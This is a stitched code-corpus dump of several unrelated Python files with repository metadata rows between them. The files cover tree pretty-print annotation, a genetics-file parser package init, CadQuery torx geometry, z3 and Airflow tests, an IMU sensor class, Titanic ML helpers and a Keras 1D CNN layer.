def build_annotated_tree(node, default_annotation):
if isinstance(node, TreeText):
annotated_children = []
else:
annotated_children = [build_annotated_tree(child, default_annotation) for child in node.children]
return PPAnnotatedSExpr(
node,
default_annotation,
annotated_children,
)
def construct_pp_tree(tree, pp_annotations):
"""Because pp notes take a t_address, they can be applied on future trees (i.e. the current tree).
The better (more general, more elegant and more performant) solution is to build the pp_tree in sync with the
general tree, and have construct_pp_tree be a function over notes from those clefs rather than on trees.
"""
annotated_tree = build_annotated_tree(tree, PPNone())
for annotation in pp_annotations:
pp_note = annotation.annotation
s_address = get_s_address_for_t_address(tree, pp_note.t_address)
if s_address is None:
continue # the node no longer exists
annotated_node = node_for_s_address(annotated_tree, s_address)
if isinstance(pp_note, PPUnset):
new_value = PPNone()
elif isinstance(pp_note, PPSetSingleLine):
new_value = PPSingleLine()
elif isinstance(pp_note, PPSetLispy):
new_value = PPLispy()
else:
raise Exception("Unknown PP Note")
# let's just do this mutably first... this is the lazy approach (but that fits with the caveats mentioned at the
# top of this method)
annotated_node.annotation = new_value
return annotated_tree
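# Illustrative sketch (hypothetical values): given an s-expr `tree` and a list
# `annotations` whose items carry a pp note in `.annotation`,
#     annotated = construct_pp_tree(tree, annotations)
# yields a PPAnnotatedSExpr whose nodes carry PPNone/PPSingleLine/PPLispy.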
| 35.679245 | 120 | 0.710206 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 507 | 0.268112 |
a8058f52d55c838079c4a938e2376efb1f6aa6ab | 3,704 | py | Python | geneparse/__init__.py | legaultmarc/geneparse | 5a844df77ded5adc765a086a8d346fce6ba01f3d | [
"MIT"
]
| 4 | 2018-11-09T11:10:24.000Z | 2021-07-23T22:17:58.000Z | geneparse/__init__.py | legaultmarc/geneparse | 5a844df77ded5adc765a086a8d346fce6ba01f3d | [
"MIT"
]
| 5 | 2017-05-02T15:28:01.000Z | 2018-04-16T18:29:15.000Z | geneparse/__init__.py | legaultmarc/geneparse | 5a844df77ded5adc765a086a8d346fce6ba01f3d | [
"MIT"
]
| 1 | 2017-05-12T17:58:32.000Z | 2017-05-12T17:58:32.000Z | """A module to parse genetics file formats."""
# This file is part of geneparse.
#
# The MIT License (MIT)
#
# Copyright (c) 2017 Pharmacogenomics Centre
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import re
from .readers import plink, impute2, dataframe, bgen, dict_based, vcf
from .core import (Genotypes, Variant, ImputedVariant, SplitChromosomeReader,
Chromosome)
from .extract.extractor import Extractor
try:
from .version import geneparse_version as __version__
except ImportError:
__version__ = None
__author__ = "Marc-Andre Legault"
__copyright__ = "Copyright 2014, Beaulieu-Saucier Pharmacogenomics Centre"
__credits__ = ["Louis-Philippe Lemieux Perreault", "Marc-Andre Legault"]
__license__ = "MIT"
__maintainer__ = "Louis-Philippe Lemieux Perreault"
__email__ = "[email protected]"
__status__ = "Development"
# TODO:
# 1. Warn and show last exception if no reader correctly initialized.
# 2. Could also make it async to load faster.
class _SplitChromosomeReaderFactory(object):
def __init__(self, reader_class):
self.reader_class = reader_class
def __call__(self, pattern, *args, **kwargs):
if "{chrom}" not in pattern:
raise ValueError("Expected '{chrom}' as a placeholder in the "
"pattern.")
# Explode the path for every possible chromosome.
chrom_to_reader = {}
last_exception = None
for chrom in list(range(1, 23)) + ["X", "Y", "XY", "MT"]:
chrom = str(chrom)
cur = re.sub("{chrom}", chrom, pattern)
try:
# Instantiate the reader.
chrom_to_reader[chrom] = self.reader_class(
cur, *args, **kwargs
)
except Exception as e:
last_exception = e
if len(chrom_to_reader) == 0:
raise ValueError(
"Could not initialize any genotype reader for chromosomes 1 "
"to 22 or X, Y, XY, MT.\nLast exception was: {}."
"".format(last_exception)
)
return SplitChromosomeReader(chrom_to_reader)
parsers = {
"plink": plink.PlinkReader,
"bgen": bgen.BGENReader,
"vcf": vcf.VCFReader,
"chrom-split-plink": _SplitChromosomeReaderFactory(plink.PlinkReader),
"impute2": impute2.Impute2Reader,
"chrom-split-impute2": _SplitChromosomeReaderFactory(
impute2.Impute2Reader
),
"chrom-split-bgen": _SplitChromosomeReaderFactory(bgen.BGENReader),
"dataframe": dataframe.DataFrameReader,
"dict-based": dict_based.DictBasedReader,
"pickle": dict_based.PickleBasedReader,
}
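# Example (illustrative; the file prefix below is hypothetical):
#     from geneparse import parsers
#     reader = parsers["chrom-split-plink"]("genotypes.chr{chrom}")
# This builds one reader per chromosome by expanding the "{chrom}" placeholder
# and wraps them all in a SplitChromosomeReader.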
| 37.04 | 79 | 0.687365 | 1,166 | 0.314795 | 0 | 0 | 0 | 0 | 0 | 0 | 1,927 | 0.520248 |
a8065cec94c9ac0bb277d2b7b2c4a7aa013dd5ba | 3,285 | py | Python | pallet.py | sprightlyManifesto/cadQuery2 | 207a1ff2420210460539400dfd1945e8b7245497 | [
"MIT"
]
| 1 | 2021-05-31T00:08:02.000Z | 2021-05-31T00:08:02.000Z | pallet.py | sprightlyManifesto/cadQuery2 | 207a1ff2420210460539400dfd1945e8b7245497 | [
"MIT"
]
| null | null | null | pallet.py | sprightlyManifesto/cadQuery2 | 207a1ff2420210460539400dfd1945e8b7245497 | [
"MIT"
]
| null | null | null | from cadquery import *
from math import sin,cos,acos,asin,pi,atan2
class Pallet:
def __init__(self):
self.torx6 = { 6:(1.75,1.27), 8:(2.4,1.75), 10:(2.8,2.05), 15:(3.35,2.4), 20:(3.95,2.85),
25:(4.50,3.25), 30:(5.6,4.05), 40:(6.75,4.85),45:(7.93,5.64), 50:(8.95,6.45),
55:(11.35,8.05),60:(13.45,9.6),70:(15.7,11.2),80:(17.75,12.8),90:(20.2,14.4),
100:(22.4,16)}
def radialSlot(self,wp,slotRad, cutterRad, a1, a2,offset=(0,0)):
if slotRad > cutterRad:
IR = slotRad-cutterRad
OR = slotRad+cutterRad
middle = a1+(a2-a1)/2
result = (wp.moveTo(IR*sin(a1),IR*cos(a1))
.threePointArc((IR*sin(middle),IR*cos(middle)),(IR*sin(a2),IR*cos(a2)))
.tangentArcPoint((cutterRad*2*sin(a2),cutterRad*2*cos(a2)))
.threePointArc((OR*sin(middle),OR*cos(middle)),(OR*sin(a1),OR*cos(a1)))
.tangentArcPoint((-cutterRad*2*sin(a1),-cutterRad*2*cos(a1))).close()
)
else:
result = wp
#log("issues")
return(result)
def hexAF(self,wp,af):
R = af/cos(pi/6)/2
return wp.moveTo(-sin(pi/6)*R,af/2).lineTo(sin(pi/6)*R,af/2).lineTo(R,0)\
.lineTo(sin(pi/6)*R,-af/2).lineTo(-sin(pi/6)*R,-af/2).lineTo(-R,0).close()
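    # Example (illustrative): hexAF(wp, af=10) sketches a hexagon with 10 mm
    # across flats; the circumradius is af / cos(pi/6) / 2 ~= 5.77 mm.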
def torx(self,wp,no):
A , B = self.torx6[no]
re=A*0.1
ri=A*0.175
x = ri*(sin(pi/6)*(A/2-re))/(re + ri)
y1 = B/2 + ri
y2 = cos(pi/6)*(A/2 - re)
y = y1 - ri*((y1 -y2))/(re + ri)
#log(f"x:{x} y1:{y1} y2:{y2}")
phi = atan2(x,y)
#log(f"phi:{round(phi,2)} x:{round(x,2)} y:{round(y,2)} re:{round(re,2)} ri:{round(ri,2)}")
R = (x**2+y**2)**0.5
Rm = A/2
B = B/2
res = wp.moveTo(R*sin(-phi),R*cos(-phi)).threePointArc((0,B),(R*sin(phi),R*cos(phi))) \
.threePointArc((Rm*sin(pi/6),Rm*cos(pi/6)),(R*sin(pi/3-phi),R*cos(pi/3-phi))) \
.threePointArc((B*sin(pi/3), B*cos(pi/3)),(R*sin(phi+pi/3),R*cos(phi+pi/3))) \
.threePointArc((Rm*sin(3*pi/6),Rm*cos(3*pi/6)),(R*sin(2*pi/3-phi),R*cos(2*pi/3-phi))) \
.threePointArc((B*sin(2*pi/3), B*cos(2*pi/3)),(R*sin(phi+2*pi/3),R*cos(phi+2*pi/3))) \
.threePointArc((Rm*sin(5*pi/6),Rm*cos(5*pi/6)),(R*sin(3*pi/3-phi),R*cos(3*pi/3-phi))) \
.threePointArc((B*sin(3*pi/3), B*cos(3*pi/3)),(R*sin(phi+3*pi/3),R*cos(phi+3*pi/3))) \
.threePointArc((Rm*sin(7*pi/6),Rm*cos(7*pi/6)),(R*sin(4*pi/3-phi),R*cos(4*pi/3-phi))) \
.threePointArc((B*sin(4*pi/3), B*cos(4*pi/3)),(R*sin(phi+4*pi/3),R*cos(phi+4*pi/3))) \
.threePointArc((Rm*sin(9*pi/6),Rm*cos(9*pi/6)),(R*sin(5*pi/3-phi),R*cos(5*pi/3-phi))) \
.threePointArc((B*sin(5*pi/3), B*cos(5*pi/3)),(R*sin(phi+5*pi/3),R*cos(phi+5*pi/3))) \
.threePointArc((Rm*sin(11*pi/6),Rm*cos(11*pi/6)),(R*sin(6*pi/3-phi),R*cos(6*pi/3-phi))) \
.close()
return res
if __name__ == "__main__":
    p = Pallet()
    ks = list(p.torx6.keys())
    ks.reverse()
    # `cq` was never imported; use the star-imported Workplane directly.
    a = Workplane().circle(12).extrude(-3)
for k in ks:
a = a.union(p.torx(a.faces(">Z").workplane(),k).extrude(1))
| 48.308824 | 101 | 0.497717 | 2,986 | 0.90898 | 0 | 0 | 0 | 0 | 0 | 0 | 150 | 0.045662 |
a8071813703c97e154c1a58b74d953608becaf8d | 235 | py | Python | old-regressions/python/tst6.py | muchang/z3test | e3e7739f98b7aa85427fcb8a39a4c675132a896e | [
"MIT"
]
| 23 | 2015-04-20T08:51:00.000Z | 2021-11-15T12:20:59.000Z | old-regressions/python/tst6.py | muchang/z3test | e3e7739f98b7aa85427fcb8a39a4c675132a896e | [
"MIT"
]
| 18 | 2016-03-02T15:17:42.000Z | 2021-12-16T22:10:05.000Z | old-regressions/python/tst6.py | muchang/z3test | e3e7739f98b7aa85427fcb8a39a4c675132a896e | [
"MIT"
]
| 30 | 2015-05-30T15:29:17.000Z | 2022-02-25T15:58:58.000Z |
# Copyright (c) 2015 Microsoft Corporation
from z3 import *
print(simplify(Sqrt(2)).sexpr())
set_option(":pp-decimal-precision", 50, pp_decimal=True)
print(simplify(Sqrt(2)).sexpr())
set_option(precision=20)
print(simplify(Sqrt(2)))
| 23.5 | 56 | 0.744681 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 65 | 0.276596 |
a808c833e4004773a8618ea9f6a2827bf0e5f1ca | 2,044 | py | Python | data-detective-airflow/tests/dag_generator/test_tdag.py | dmitriy-e/metadata-governance | 018a879951dee3f3c2c05ac8e05b8360dd7f4ab3 | [
"Apache-2.0"
]
| 5 | 2021-12-01T09:55:23.000Z | 2021-12-21T16:23:33.000Z | data-detective-airflow/tests/dag_generator/test_tdag.py | dmitriy-e/metadata-governance | 018a879951dee3f3c2c05ac8e05b8360dd7f4ab3 | [
"Apache-2.0"
]
| 1 | 2021-11-16T15:55:34.000Z | 2021-11-16T15:55:34.000Z | data-detective-airflow/tests/dag_generator/test_tdag.py | dmitriy-e/metadata-governance | 018a879951dee3f3c2c05ac8e05b8360dd7f4ab3 | [
"Apache-2.0"
]
| 2 | 2021-11-03T09:43:09.000Z | 2021-11-17T10:16:29.000Z | import pytest
import allure
from data_detective_airflow.constants import PG_CONN_ID, S3_CONN_ID
from data_detective_airflow.dag_generator.results import PgResult, PickleResult
from data_detective_airflow.dag_generator import ResultType, WorkType
@allure.feature('Dag results')
@allure.story('Create Pickle')
def test_dag_file_create_result(test_dag, context):
dag_result = test_dag.get_result(operator=None,
result_name='test',
context=context,
result_type=test_dag.result_type,
work_type=test_dag.work_type)
assert isinstance(dag_result, PickleResult)
test_dag.clear_all_works(context)
@allure.feature('Dag results')
@allure.story('Create S3')
@pytest.mark.parametrize('test_dag',
[(ResultType.RESULT_PICKLE.value,
WorkType.WORK_S3.value,
S3_CONN_ID)],
indirect=True)
def test_dag_s3_create_result(test_dag, context):
dag_result = test_dag.get_result(operator=None, result_name='test', context=context,
result_type=test_dag.result_type,
work_type=test_dag.work_type)
assert isinstance(dag_result, PickleResult)
test_dag.clear_all_works(context)
@allure.feature('Dag results')
@allure.story('Create PG')
@pytest.mark.parametrize('test_dag',
[(ResultType.RESULT_PG.value,
WorkType.WORK_PG.value,
PG_CONN_ID)],
indirect=True)
def test_dag_pg_create_result(test_dag, context):
dag_result = test_dag.get_result(operator=None, result_name='test', context=context,
result_type=test_dag.result_type,
work_type=test_dag.work_type)
assert isinstance(dag_result, PgResult)
test_dag.clear_all_works(context)
| 41.714286 | 88 | 0.611546 | 0 | 0 | 0 | 0 | 1,788 | 0.874755 | 0 | 0 | 114 | 0.055773 |
a8094575efb5f9d3bcb611dcb83074209e70f07f | 478 | py | Python | Algorithms/Easy/830. Positions of Large Groups/answer.py | KenWoo/Algorithm | 4012a2f0a099a502df1e5df2e39faa75fe6463e8 | [
"Apache-2.0"
]
| null | null | null | Algorithms/Easy/830. Positions of Large Groups/answer.py | KenWoo/Algorithm | 4012a2f0a099a502df1e5df2e39faa75fe6463e8 | [
"Apache-2.0"
]
| null | null | null | Algorithms/Easy/830. Positions of Large Groups/answer.py | KenWoo/Algorithm | 4012a2f0a099a502df1e5df2e39faa75fe6463e8 | [
"Apache-2.0"
]
| null | null | null | from typing import List
class Solution:
def largeGroupPositions(self, S: str) -> List[List[int]]:
l = []
start = end = 0
while start < len(S):
while end < len(S) and S[start] == S[end]:
end += 1
if end - start >= 3:
l.append([start, end - 1])
start = end
return l
if __name__ == "__main__":
s = Solution()
result = s.largeGroupPositions("abc")
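    # "abc" has no run of 3 or more equal characters, so this prints [].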
print(result)
| 22.761905 | 61 | 0.493724 | 343 | 0.717573 | 0 | 0 | 0 | 0 | 0 | 0 | 15 | 0.031381 |
a80a22c9f777e08edf7fe7ed83b93c4fd1e307bc | 1,727 | py | Python | imu.py | aume1/SatelliteTracker | 62725e1d1a72a1350b2af15d9e33fcd574ceb3a2 | [
"MIT"
]
| 2 | 2021-06-19T17:17:30.000Z | 2021-06-19T17:17:39.000Z | imu.py | aume1/SatelliteTracker | 62725e1d1a72a1350b2af15d9e33fcd574ceb3a2 | [
"MIT"
]
| null | null | null | imu.py | aume1/SatelliteTracker | 62725e1d1a72a1350b2af15d9e33fcd574ceb3a2 | [
"MIT"
]
| 1 | 2021-06-19T17:18:32.000Z | 2021-06-19T17:18:32.000Z | import time
import math
import py_qmc5883l
import pigpio
import adafruit_bmp280
from i2c_ADXL345 import ADXL345
import numpy as np
from i2c_ITG3205 import Gyro
class IMU:
def __init__(self, pi):
self.gyro = Gyro(pi)
self.accel = ADXL345(pi)
self.mag = py_qmc5883l.QMC5883L(pi)
rpy = list(self.get_roll_pitch_yaw())
self._prev_time = time.time()
def get_accel(self):
return self.accel.get_xyz_accel()
def get_gyro(self):
return self.gyro.get_rotations()
def get_mag(self):
return self.mag.get_dir()
def get_north(self):
D = self.get_accel()
D_mag = math.sqrt(D[0]**2 + D[1]**2 + D[2]**2)
D = [x/D_mag for x in D]
# D = [x for x in acc_unit] # used to be negative, flipped sensor so it is positive now
E = np.cross(D, self.get_mag()) # east is the cross-product of down and the direction of magnet
e_mag = math.sqrt(E[0]**2 + E[1]**2 + E[2]**2)
E /= e_mag
N = np.cross(E, D) # north is the cross-product of east and down
n_mag = math.sqrt(N[0] ** 2 + N[1] ** 2 + N[2] ** 2)
N /= n_mag
return N
def get_roll_pitch_yaw(self):
x, y, z = self.get_accel()
x_Buff = float(x)
y_Buff = float(y)
z_Buff = float(z)
roll = 180 + math.atan2(y_Buff, z_Buff) * 57.3
pitch = math.atan2((- x_Buff), math.sqrt(y_Buff * y_Buff + z_Buff * z_Buff)) * 57.3
if roll > 180:
roll -= 360
yaw = self.mag.get_bearing()
return roll, pitch, yaw
if __name__ == "__main__":
pi = pigpio.pi('192.168.178.229')
imu = IMU(pi)
while True:
print(imu.get_roll_pitch_yaw())
| 28.311475 | 104 | 0.579618 | 1,423 | 0.823972 | 0 | 0 | 0 | 0 | 0 | 0 | 223 | 0.129126 |
a80b6a8d0bacba13b3fe61daf36962d8ad3001a4 | 8,892 | py | Python | src/titanic/tit_utils.py | buffbob/titanic | 1e52814076ad78f6f9845d7b8f829889977a907b | [
"MIT"
]
| null | null | null | src/titanic/tit_utils.py | buffbob/titanic | 1e52814076ad78f6f9845d7b8f829889977a907b | [
"MIT"
]
| null | null | null | src/titanic/tit_utils.py | buffbob/titanic | 1e52814076ad78f6f9845d7b8f829889977a907b | [
"MIT"
]
| null | null | null | import pandas as pd
from sklearn.model_selection import GridSearchCV, train_test_split, cross_val_score
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import accuracy_score, classification_report
import matplotlib.pyplot as plt
import numpy as np
import category_encoders as ce
from sklearn.preprocessing import StandardScaler, LabelEncoder, OneHotEncoder, OrdinalEncoder
def load_tit(path):
"""
downloads data from kaggle stored at path = "../Data/"
returns a tuple of our titanic datasets- (train,test)
"""
train = pd.read_csv(path + 'tit_train.csv')
test = pd.read_csv(path + "tit_test.csv")
return (train, test)
def gscv_results_terse(model, params, X_train, y_train, X_test, y_test):
'''
    model = a classifier, params = a dict to feed to GridSearchCV.
    Prints the best parameters and the 10-fold CV accuracy of the best estimator.
'''
scores = ["accuracy"]
for score in scores:
print("# Tuning hyper-parameters for %s" % score)
clf = GridSearchCV(model, params, cv=10,
scoring=score)
clf.fit(X_train, y_train)
print("Best parameters set found on development set: \n{}".format(clf.best_params_))
print('___________________________________')
print('cv scores on the best estimator')
scores = cross_val_score(clf.best_estimator_, X_train, y_train, scoring="accuracy", cv=10)
print(scores)
print('the average cv score is {:.3} with a std of {:.3}'.format(np.mean(scores), np.std(scores)))
return clf
def print_gscv_results(model, params, X_train, y_train, X_test, y_test):
'''
    model = a classifier, params = a dict to feed to GridSearchCV;
    prints a detailed grid-search summary and a classification report.
'''
scores = ["accuracy"]
for score in scores:
print("# Tuning hyper-parameters for %s" % score)
print()
clf = GridSearchCV(model, params, cv=5,
scoring=score)
clf.fit(X_train, y_train)
print("Best parameters set found on development set:")
print()
print(clf.best_params_)
print()
print("Grid scores on development set:")
print()
means = clf.cv_results_['mean_test_score']
stds = clf.cv_results_['std_test_score']
for mean, std, params in zip(means, stds, clf.cv_results_['params']):
print("%0.3f (+/-%0.03f) for %r"
% (mean, std * 2, params))
print()
print("Detailed classification report:")
print()
print("The model is trained on the full development set.")
print("The scores are computed on the full evaluation set.")
print()
y_true, y_pred = y_test, clf.predict(X_test)
print(classification_report(y_true, y_pred))
print('________________________________________________')
print('best params for model are {}'.format(clf.best_params_))
print('\n___________________________________\n')
print('cv scores on the best estimator')
scores = cross_val_score(clf.best_estimator_, X_train, y_train, scoring="accuracy", cv=10)
print(scores)
print('the average cv score is {:.2}\n\n'.format(np.mean(scores)))
return clf
def visualize_classifier(model, X, y, ax=None, cmap='rainbow'):
"""
    Plot the decision regions of `model` over a 2D dataset X
    (two feature columns), colored by the labels y.
"""
ax = ax or plt.gca()
# Plot the training points
ax.scatter(X.iloc[:, 0], X.iloc[:, 1], c=y, s=30, cmap=cmap,
clim=(y.min(), y.max()), zorder=3)
ax.axis('tight')
ax.axis('off')
xlim = ax.get_xlim()
ylim = ax.get_ylim()
# fit the estimator
model.fit(X, y)
xx, yy = np.meshgrid(np.linspace(*xlim, num=200),
np.linspace(*ylim, num=200))
Z = model.predict(np.c_[xx.ravel(), yy.ravel()]).reshape(xx.shape)
# Create a color plot with the results
n_classes = len(np.unique(y))
contours = ax.contourf(xx, yy, Z, alpha=0.3,
levels=np.arange(n_classes + 1) - 0.5,
cmap=cmap, clim=(y.min(), y.max()),
zorder=1)
ax.set(xlim=xlim, ylim=ylim)
# this dataset has unique cols so we will go through one by one
def pp_Embarked(df):
"""
simply adds 'C' where missing values are present
inplace imputation
return df
"""
df.Embarked.fillna("C", inplace=True)
return df
def pp_Name(df):
"""
extracts the title from the Name column
returns- df with a new column named Title appended to original df
"""
temp = df.Name.apply(lambda x: x.split(',')[1].split(".")[0].strip())
df['Title'] = temp
return df
def pp_Age(df):
"""
imputes missing values of age through a groupby([Pclass,Title,isFemale])
returns df with new column named Age_nonull appended to it
"""
transformed_Age = df.groupby(["Title", 'Pclass', "Sex"])['Age'].transform(lambda x: x.fillna(x.median()))
df['Age_nonull'] = transformed_Age
return df
def pp_Fare(df):
'''
This will clip outliers to the middle 98% of the range
'''
temp = df['Fare'].copy()
limits = np.percentile(temp, [1, 99])
df.Fare = np.clip(temp, limits[0], limits[1])
return df
def pp_AgeBin(df):
"""
takes Age_nonull and puts in bins
returns df with new column- AgeBin
"""
z = df.Age_nonull.round() # some values went to 0 so clip to 1
binborders = np.linspace(0, 80, 17)
z = z.clip(1, None)
z = z.astype("int32")
df['AgeBin'] = pd.cut(z, bins=binborders, labels=False)
return df
def pp_Sex(df):
"""
maps male and female to 0 and 1
returns the df with is_Female added
"""
df['is_Female'] = df.Sex.apply(lambda row: 0 if row == "male" else 1) # one way
return df
def pp_Cabin(df):
"""
extracts the deck from the cabin. Mostly 1st class has cabin assignments. Replace
nan with "unk". Leaves as an ordinal categorical. can be onehoted later.
returns the df with Deck added as a column
"""
df["Deck"] = "UNK"
temp = df.loc[df.Cabin.notnull(), :].copy()
temp['D'] = temp.Cabin.apply(lambda z: z[0])
df.iloc[temp.index, -1] = temp["D"]
# df.where(df.Deck != "0", "UNK")
return df
def oneHot(df,col_list):
for col in col_list:
newcol_names = []
oh = OneHotEncoder(dtype="uint8",categories='auto')
# must convert df/series to array for onehot
vals = df[[col]].values
temp = oh.fit_transform(vals).toarray()#converts sparse to normal array
# the new names for columns
for name in oh.categories_[0]:
newcol_names.append(col + "_" + str(name))
tempdf = pd.DataFrame(temp, columns = newcol_names)
df = pd.concat([df, tempdf], axis=1)
return df
def scaleNumeric(df, cols):
"""
Standardize features by removing the mean and scaling to unit variance
"""
ss = StandardScaler()
scaled_features = ss.fit_transform(df[cols].values)
for i, col in enumerate(cols):
df[col + "_scaled"] = scaled_features[:, i]
return df
def chooseFeatures(df, alist):
"""
df is our dataframe with all new features added
alist is a list of cols to select for a new dataframe
returns df[alist]
"""
return df[alist]
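# Example pipeline sketch (assumes `train` from load_tit and the columns above):
#     df = pp_Cabin(pp_Sex(pp_AgeBin(pp_Age(pp_Name(pp_Embarked(train))))))
#     X = chooseFeatures(df, ['is_Female', 'AgeBin', 'Pclass'])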
def test_dtc(alist, df, labels):
"""
tests a decision tree model for classification
    prints out way too much stuff
returns a GridSearchCV classifier
"""
a = df[alist] # select columns
X_train, X_test, y_train, y_test = train_test_split(a, labels, test_size=0.2, random_state=42)
dtc = DecisionTreeClassifier()
    dtc_dict = [{"max_depth": [2, 5, 8, 12, 15], "min_samples_leaf": [1, 2, 3],
"max_features": [None, 1.0, 2, 'sqrt', X_train.shape[1]]}]
clf = gscv_results_terse(dtc, dtc_dict, X_train, y_train, X_test, y_test)
return clf
#########################################################
# some utilities functions to aid in ml in general
def lin_to_log_even(min_num, max_num, num_pts=10):
"""
    This is really only needed when min_num << 1 and max_num >> 1.
creates an evenly spaced log space from min_num to max_num
"""
lmin = np.log10(min_num)
lmax = np.log10(max_num)
ls = np.linspace(lmin, lmax, num_pts)
log_spaces = np.power(10, ls)
# print(["{:05f}".format(each) for each in log_spaces])
return log_spaces
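# Example: lin_to_log_even(1e-4, 1e2, num_pts=4) gives points whose exponents
# are evenly spaced, i.e. approximately [1e-4, 1e-2, 1e0, 1e2].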
def lin_to_log_random(num1, num2, num_pts=10):
"""
    This is really only needed when num1 << 1 and num2 >> 1.
creates an array of random selected pts of len num_pts
each point is in the log space from min_num to max_num
"""
ln1 = np.log10(num1)
ln2 = np.log10(num2)
range_bn = np.abs(ln2 - ln1)
z = ln2 + np.random.rand(num_pts) * -range_bn
zz = np.power(10, z)
print(["{:05f}".format(each) for each in zz])
return zz | 31.870968 | 109 | 0.624944 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,453 | 0.388327 |
a80bd9815a0efacc56fe16adf0b6e490442b6851 | 161 | py | Python | magic_markdown/__init__.py | transfluxus/magic_markdown | 3a71d0c0a0937dc87973b6e19389f27575e16208 | [
"MIT"
]
| 10 | 2019-04-09T17:33:52.000Z | 2021-05-10T04:58:59.000Z | magic_markdown/__init__.py | transfluxus/magic_markdown | 3a71d0c0a0937dc87973b6e19389f27575e16208 | [
"MIT"
]
| null | null | null | magic_markdown/__init__.py | transfluxus/magic_markdown | 3a71d0c0a0937dc87973b6e19389f27575e16208 | [
"MIT"
]
| null | null | null | name = "magic_markdown"
from magic_markdown.MagicMarkdown import MagicMarkdown
def load_ipython_extension(ipython):
ipython.register_magics(MagicMarkdown)
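# Usage (in IPython/Jupyter, once the package is installed):
#     %load_ext magic_markdown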
| 23 | 54 | 0.838509 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 16 | 0.099379 |
a80cfdeae5dd9779dfdf75f7f464b230527883ae | 1,167 | py | Python | src/Tests/power_generators_tests/solar_panel_tests/solar_panel_east_west_test.py | BoKleynen/P-O-3-Smart-Energy-Home | 4849038c47199aa0a752ff5a4f2afa91f4a9e8f0 | [
"MIT"
]
| null | null | null | src/Tests/power_generators_tests/solar_panel_tests/solar_panel_east_west_test.py | BoKleynen/P-O-3-Smart-Energy-Home | 4849038c47199aa0a752ff5a4f2afa91f4a9e8f0 | [
"MIT"
]
| null | null | null | src/Tests/power_generators_tests/solar_panel_tests/solar_panel_east_west_test.py | BoKleynen/P-O-3-Smart-Energy-Home | 4849038c47199aa0a752ff5a4f2afa91f4a9e8f0 | [
"MIT"
]
| null | null | null | import matplotlib.pyplot as plt
import pandas as pd
from house.production.solar_panel import SolarPanel
from house import House
from math import pi
from time import time
start_time = time()
solar_panel_east = SolarPanel(285.0, 10*pi/180, -pi/2, 0.87, 1.540539, 10)
solar_panel_west = SolarPanel(285.0, 10*pi/180, pi/2, 0.87, 1.540539, 10)
house = House([], solar_panel_tp=(solar_panel_east, solar_panel_west))
irradiance_df = pd.read_csv(filepath_or_buffer="C:\\Users\\Lander\\Documents\\KULeuven\\2e bachelor\\semester 1\\P&O 3\\P-O-3-Smart-Energy-Home\\data\\Irradiance.csv",
header=0,
index_col="Date/Time",
dtype={"watts-per-meter-sq": float},
parse_dates=["Date/Time"]
)
start = pd.Timestamp("2016-06-17 00:00:00")
# end = pd.Timestamp("2017-04-21 23:55:00")
end = pd.Timestamp("2016-06-17 23:55:00")
times = pd.date_range(start, end, freq="300S")
data = [house.power_production(t, irradiance_df) for t in pd.date_range(start, end, freq="300S")]
# print(data)
plt.plot(data)
print(time() - start_time)
plt.show()
| 33.342857 | 167 | 0.642674 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 271 | 0.232219 |
a813a7003f5f5d2c9a1b282747c12188d836b770 | 2,468 | py | Python | src/lsct/models/cnn_1d.py | junyongyou/lsct_phiqnet | ffa546b3225c7db0bc7977565dc11a91186fe939 | [
"MIT"
]
| 9 | 2021-11-01T06:06:33.000Z | 2022-02-07T12:21:18.000Z | src/lsct/models/cnn_1d.py | junyongyou/lsct_phiqnet | ffa546b3225c7db0bc7977565dc11a91186fe939 | [
"MIT"
]
| null | null | null | src/lsct/models/cnn_1d.py | junyongyou/lsct_phiqnet | ffa546b3225c7db0bc7977565dc11a91186fe939 | [
"MIT"
]
| 1 | 2022-03-06T07:38:32.000Z | 2022-03-06T07:38:32.000Z | from tensorflow.keras.layers import Layer, Conv1D, Input, Dropout, MaxPool1D, Masking
import tensorflow.keras.backend as K
from tensorflow.keras import Model
import tensorflow as tf
class CNN1D(Layer):
def __init__(self, filters=(32, 64), pooling_sizes=(4, 4), kernel_size=3, stride_size=1, using_dropout=True,
using_bias=False, dropout_rate=0.1, **kwargs):
"""
1D CNN model
:param filters: filter numbers in the CNN blocks
:param pooling_sizes: max pooling size in each block
:param kernel_size: kernel size of CNN layer
:param stride_size: stride of CNN layer
:param using_dropout: flag to use dropout or not
:param using_bias: flag to use bias in CNN or not
:param dropout_rate: dropout rate if using it
        :param kwargs: other config params
"""
self.filters = filters
self.kernel_size = kernel_size
self.stride_size = stride_size
self.using_dropout = using_dropout
self.conv1d = []
self.pooling = []
self.dropout = []
for i, s_filter in enumerate(filters):
self.conv1d.append(Conv1D(s_filter,
kernel_size,
padding='same',
strides=stride_size,
use_bias=using_bias,
name='conv{}'.format(i)
))
self.pooling.append(MaxPool1D(pool_size=pooling_sizes[i], name='pool{}'.format(i)))
if using_dropout:
self.dropout = Dropout(rate=dropout_rate)
super(CNN1D, self).__init__(**kwargs)
def build(self, input_shape):
super(CNN1D, self).build(input_shape)
def call(self, x, mask=None):
for i in range(len(self.conv1d)):
x = self.conv1d[i](x)
x = self.pooling[i](x)
if self.using_dropout:
x = self.dropout(x)
x = K.squeeze(x, axis=-2)
return x
def compute_output_shape(self, input_shape):
return 1, self.filters[-1]
if __name__ == '__main__':
input_shape = (16, 5 * 256)
